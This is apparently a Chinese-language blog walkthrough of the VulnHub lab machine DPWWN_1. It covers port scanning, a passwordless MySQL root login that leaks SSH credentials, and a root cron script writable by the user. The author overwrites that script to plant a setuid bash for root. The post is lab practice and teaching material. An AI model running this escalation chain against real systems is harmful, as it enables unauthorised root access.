DPWWN_1靶机

DPWWN_1 靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.142
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 23:04 EDT
Nmap scan report for 192.1.1.142
Host is up (0.0011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:74:F0:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds

开放了 22,80,3306 端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.142  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 23:04 EDT
Nmap scan report for 192.1.1.142
Host is up (0.00022s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:74:F0:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds

UDP 扫描没什么有价值的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306 192.1.1.142      
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 23:10 EDT
Nmap scan report for 192.1.1.142
Host is up (0.0019s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c1:d3:be:39:42:9d:5c:b4:95:2c:5b:2e:20:59:0e:3a (RSA)
|   256 43:4a:c6:10:e7:17:7d:a0:c0:c3:76:88:1d:43:a1:8c (ECDSA)
|_  256 0e:cc:e3:e1:f7:87:73:a1:03:47:b9:e2:cf:1c:93:15 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open  mysql   MySQL 5.5.60-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.60-MariaDB
|   Thread ID: 4
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsTransactions, Support41Auth, DontAllowDatabaseTableColumn, InteractiveClient, FoundRows, ConnectWithDatabase, LongColumnFlag, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, ODBCClient, SupportsCompression, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: i7tdxO_q9h#q3GK#ik^t
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:74:F0:06 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.48 seconds

Apache/2.4.6 (CentOS) PHP/5.4.16, MySQL 5.5.60-MariaDB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,3306 192.1.1.142     
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-26 23:14 EDT
Nmap scan report for 192.1.1.142
Host is up (0.00026s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-enum: 
|   /info.php: Possible information file
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:74:F0:06 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.22 seconds

漏洞脚本扫描给了个 info.php,打开发现是 phpinfo 界面,从中提取了一些系统和路径的信息。

MySQL 登录

尝试登录mysql

1
2
3
┌──(kali㉿kali)-[~/Downloads/DPWWN_1]
└─$ mysql -u root -h 192.1.1.142
ERROR 1129 (HY000): Host '192.1.1.128' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'

呃呃呃,好像有点问题,连接太多,猜测可能是之前扫描的问题。刚开始没管这个错误,开始找别的思路,尝试了从 phpinfo 里找突破口,从目录爆破找隐藏文件夹,但是都失败了,这台靶机暴露面比较少。偷瞄了眼 WP,确定是 MySQL 登录作为攻击面,于是果断重启靶机,后面就很简单了,从数据库的各个表里找泄露的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿kali)-[~/Downloads/DPWWN_1]
└─$ mysql -u root -h 192.1.1.142
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 2
Server version: 5.5.60-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| ssh                |
+--------------------+
4 rows in set (0.008 sec)

MariaDB [(none)]> use ssh
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [ssh]> show tables;
+---------------+
| Tables_in_ssh |
+---------------+
| users         |
+---------------+
1 row in set (0.009 sec)

MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.002 sec)

ssh 登录

拿到了 ssh 的用户名和密码,尝试登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿kali)-[~/Downloads/DPWWN_1]
└─$ ssh mistic@192.1.1.142                  
The authenticity of host '192.1.1.142 (192.1.1.142)' can\'t be established.
ED25519 key fingerprint is SHA256:gk40nSGfkMrCYAeMyL2l9aCwV/VL5i5mWKrFfowOfH0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.142' (ED25519) to the list of known hosts.
mistic@192.1.1.142\'s password: 
Last login: Thu Aug  1 14:41:37 2019 from 192.168.30.145
[mistic@dpwwn-01 ~]$ whoami
mistic
[mistic@dpwwn-01 ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:74:f0:06 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.142/24 brd 192.1.1.255 scope global noprefixroute dynamic ens33
       valid_lft 1336sec preferred_lft 1336sec
    inet6 fe80::20c:29ff:fe74:f006/64 scope link 
       valid_lft forever preferred_lft forever
[mistic@dpwwn-01 ~]$ uname -a
Linux dpwwn-01 3.10.0-957.el7.centos.plus.i686 #1 SMP Wed Nov 7 19:17:19 UTC 2018 i686 i686 i386 GNU/Linux
[mistic@dpwwn-01 ~]$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for mistic: 
Sorry, user mistic may not run sudo on dpwwn-01.

登录成功,接下来看看当前家目录下的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
[mistic@dpwwn-01 ~]$ ls -liah
total 16K
2536099 drwx------. 2 mistic mistic 100 Aug  1  2019 .
     79 drwxr-xr-x. 3 root   root    20 Aug  1  2019 ..
2536125 -rw-------. 1 mistic mistic   0 Aug  1  2019 .bash_history
2536100 -rw-r--r--. 1 mistic mistic  18 Oct 30  2018 .bash_logout
2536101 -rw-r--r--. 1 mistic mistic 193 Oct 30  2018 .bash_profile
2536102 -rw-r--r--. 1 mistic mistic 231 Oct 30  2018 .bashrc
2536126 -rwx------. 1 mistic mistic 186 Aug  1  2019 logrot.sh
[mistic@dpwwn-01 ~]$ cat logrot.sh 
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"


while : ; do
  read line
  while [[ -f $SEMAPHORE ]]; do
    sleep 1s
  done
  printf "%s\n" "$line" >> $LOGFILE
done

定时任务

感觉像个定时任务的脚本,而且这个文件是当前用户完全可控的,看看定时任务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[mistic@dpwwn-01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

*/3 *  * * *  root  /home/mistic/logrot.sh

那接下来就简单了,可以把 bash 复制出来然后赋予 s 权限,也可以把当前用户加入 sudoer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
[mistic@dpwwn-01 ~]$ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > logrot.sh 
[mistic@dpwwn-01 ~]$ cat logrot.sh 
cp /bin/bash /tmp/bash; chmod +s /tmp/bash
[mistic@dpwwn-01 ~]$ cd /tmp
[mistic@dpwwn-01 tmp]$ ll
total 900
-rwsr-sr-x. 1 root root 918400 Jun 27 02:54 bash
drwx------. 3 root root     17 Jun 26 22:55 systemd-private-53b92180216b468cb1083272653633e5-chronyd.service-aSeucn
drwx------. 3 root root     17 Jun 26 22:56 systemd-private-53b92180216b468cb1083272653633e5-httpd.service-D495YP
drwx------. 3 root root     17 Jun 26 22:56 systemd-private-53b92180216b468cb1083272653633e5-mariadb.service-0VDwAm
drwx------. 3 root root     17 Jun 27 02:42 systemd-private-ee4d9ae84e8a4c878ca61f256dda3329-chronyd.service-abFUnb
drwx------. 3 root root     17 Jun 27 02:42 systemd-private-ee4d9ae84e8a4c878ca61f256dda3329-httpd.service-xbcok8
drwx------. 3 root root     17 Jun 27 02:42 systemd-private-ee4d9ae84e8a4c878ca61f256dda3329-mariadb.service-m3bA7F
[mistic@dpwwn-01 tmp]$ ./bash -p
bash-4.2# whoami
root
bash-4.2# id
uid=1000(mistic) gid=1000(mistic) euid=0(root) egid=0(root) groups=0(root),1000(mistic) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-4.2# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:74:f0:06 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.142/24 brd 192.1.1.255 scope global noprefixroute dynamic ens33
       valid_lft 1336sec preferred_lft 1336sec
    inet6 fe80::20c:29ff:fe74:f006/64 scope link 
       valid_lft forever preferred_lft forever

knowledge_database > vulnhub
DPWWN_1靶机
https://i3eg1nner.github.io/2023/06/15e7bb7309ab.html
作者
I3eg1nner
发布于
2023年6月27日
许可协议